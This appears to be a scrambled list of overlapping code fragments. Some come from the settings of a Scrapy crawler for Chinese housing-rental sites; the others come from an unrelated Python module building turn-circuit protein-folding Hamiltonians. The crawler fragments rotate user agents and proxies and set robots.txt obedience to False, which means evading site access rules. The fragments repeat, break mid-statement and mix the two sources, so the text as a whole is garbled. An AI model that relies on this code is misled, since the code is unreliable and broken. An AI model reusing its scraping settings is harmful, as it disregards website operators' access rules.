'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = {", ".NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322;", "CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE", "= 10 # The maximum download delay to be set in case of", "= 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',", "'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT", "NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET", "1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR", "http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 #", "delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 #", "IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension", "(KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8;", "NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE", "' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',", "'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为", "stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES =", "'2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE", "remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing throttling stats for every response", "Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko)", "2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN)", "'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR", "Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko", "= 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML,", ".NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible;", "Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;)", "Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',", "1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows", "download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10", "rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko)", ".NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows;", "= ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X", "(KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux;", "InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15", "' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT", ") ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False", "OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel", "Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U;", "1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':", "30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities':", "(Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 ('", "X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac", "CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible;", "{ 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群),", "RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities,", "MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle extension (disabled by default)", "MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;", "} DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware':", "the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True #", "6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET", "'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR", "'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为 None, 不会去重 REDIS_PORT =", "AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS", "a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders'", "False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { }", "like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE", "Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh;", "Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like", "zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0", "latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy should be", "4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows;", "PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2;", "( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322;", "NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)',", "= False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', }", "be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average", "# Enable and configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html", "'.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0", "Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56", "(compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR", "5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0", "{ } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,", "'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure", "= 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': {", "3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET", "lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE =", "Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0;", "Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64;", "10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS", "Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET", "'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline':", "OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS", "U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',", "throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES", "Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh;", "of requests Scrapy should be sending in parallel to # each remote server", "(Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows", "COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh;", "(Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15',", "(X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8)", "= { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware':", "= 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1", "NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; '", "maximum download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY =", "AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0 (Macintosh; Intel Mac OS X", "6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR", "AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The", "delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be set in", "NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)',", "U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686;", "'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS", "False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES", "100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS =", "(' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko,", "2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR", "X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10", "None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400,", "= ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR", "# The average number of requests Scrapy should be sending in parallel to", "a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None,", "MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET", "Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR", "zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11;", "'58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点,", "Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows", "U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows NT 6.1; WOW64)", "} IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and configure the AutoThrottle", "LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map':", "5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0", "2.0 # Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True", "' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0;", "Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False", "ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED", "# See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay AUTOTHROTTLE_START_DELAY =", "<gh_stars>100-1000 # -*- coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME =", "NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0;", "COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en',", "}, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES", "= 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities':" ]
[ "(1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks", "the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i,", "r in range(maximum)]) for k in ['y', 'z']]) return prefactor * \\ (", "j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j,", "if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "= self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string", "sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self,", "range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in", "a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", ".qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def", "for t in range(i, j)] elif k == 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self,", "moves in the direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self,", "qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k", "1 if the chain moves in the direction x+.\"\"\" return (1-q_i)*q_j def circuit_xn(self,", "sympy as sp import symengine as se from abc import * from tqdm", "#self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit", "(1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "(1-q_i) * q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the sum", "* self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self,", "from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True", "self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term() self.expr += (self.naas+1)", "import * from tqdm import tqdm, trange from copy import deepcopy from itertools", "ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein hamiltonian of the \"turn", "= [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-':", "def interaction_term_ij(self, i, j): return -1 * self.int_mat[i, j] * (self.a_x(i, j) +", "term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1),", "in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0, t+1,", "sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r", "self.naas)]) for i in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+':", "Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression", "returns 1 if the chain moves in the direction z+.\"\"\" return (1-q_i) *", "def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr +=", "return qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D", "self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) *", "2) if t > 1 else [1] for h in iterator: if self.ss_fmat", "in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return", "q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def", "+ \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)),", "direction z-.\"\"\" return (1-q_i) * q_j * (1-q_k) def circuit_000(self, q_i, q_j, q_k):", "\\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "of the \"turn circuit encoding\" form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring)", "self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self): return 2", "sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]", "q_i * q_j * q_k def circuit_xn(self, q_i, q_j, q_k): \"\"\"Implements a circuit", "+ \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)])", "self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap", "1 if the chain moves in the direction x-.\"\"\" return q_i * (1-q_j)", "self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts", "maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum == 0: return", "in range(maximum)]) for k in ['y', 'z']]) return prefactor * \\ ( qxor(sumstring['x+'][0],", "circuit_yn(self, q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves", "'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k", "import reduce from .qlogic import * from proteinham.core.hamiltonian import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit", "qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0],", "0 else 0 if (j-i) % 2 != 0 or maximum < 2:", "the chain moves in the direction y-.\"\"\" return q_i * q_j * (1-q_k)", "!=0 else 0 if maximum == 0: return 0 prefactor = qand([ qand([", "self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)),", "range(1, p-1)]) \\ * qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\", "[self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] elif k == 'x-': sum_string =", "for i in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i,", "(self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr", "\\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([", "qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1])", "\\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in", "expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def pointer(self,", "in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j, k): \"\"\"Computes the", "p in range(2, maximum+1)])) def a_z(self, i, j): sumstring = { 'x+': self.sum_string(i,", "if self.int_mat[i, 1+i+2*j] == 0: continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class", "self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr", "b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i)))", "self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does", "in range(1, maximum)]) \\ + sum([ qxor(sumstring['x+'][p-2], sumstring['x+'][p-1]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x+'][r])", "in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i,", "circuit that returns 1 if the chain moves in the direction z-.\"\"\" return", "1 if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self,", "abc import * from tqdm import tqdm, trange from copy import deepcopy from", "qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1])", "dim(self): return 2 def pointer(self, i): \"\"\"Points to the start of the string", "circuit that returns 1 if the chain moves in the direction y+.\"\"\" return", "t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for", "in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i,", "self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t", "direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k def circuit_zn(self, q_i, q_j, q_k):", "\\ self.a_y(i, j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for", "the chain moves in the direction y+.\"\"\" return q_i * (1-q_j) * q_k", "True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the expression and methods of a protein", "qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1])", 